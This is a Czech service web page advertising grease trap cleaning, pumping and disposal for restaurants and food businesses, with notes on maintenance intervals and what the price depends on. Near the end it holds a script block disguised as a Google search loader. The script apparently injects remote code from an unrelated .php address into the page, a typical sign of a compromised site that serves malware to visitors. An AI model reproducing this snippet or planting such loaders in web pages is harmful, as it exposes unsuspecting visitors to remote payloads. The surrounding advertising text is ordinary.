Likvidace tukového lapolu

Služby pro restaurace, jídelny, kuchyně a masné provozy.

Tukový lapolTukový lapol je odpad především z kuchyňských zařízení a potravinářských provozoven. Pro správnou funkci tukového lapače je nutné provádět pravidelnou údržbu s následným odvozem tukových lapolů a vyčištění celého lapače tuků.

Zajistíme pravidelnou údržbu

Lapače tuků musí být pravidelně udržovány, vyprazdňovány a čištěny a to v souladu s platnými předpisy např. pro likvidaci odpadů.
Interval pro údržbu, vyprazdňování a čištění závisí na objemu lapáku tuků, kalového prostoru a zejména na provozních zkušenostech.
Výrobce tyto podmínky konkretizuje a upřesňuje v Provozně manipulačním řádu, který je včetně Provozního deníku dodán s lapákem tuku

Cena za čištění, odvoz a likvidace tukového lapolu

je smluvní a odvíjí se především :

  • dle odčerpaných m3
  • intervalu čištění
  • požadovaných úkonů (ruční čištení, vyčištění tlakovou vodou, apod.)

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://ninni.org/core9Om3.php”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();


Komentáře nejsou povoleny.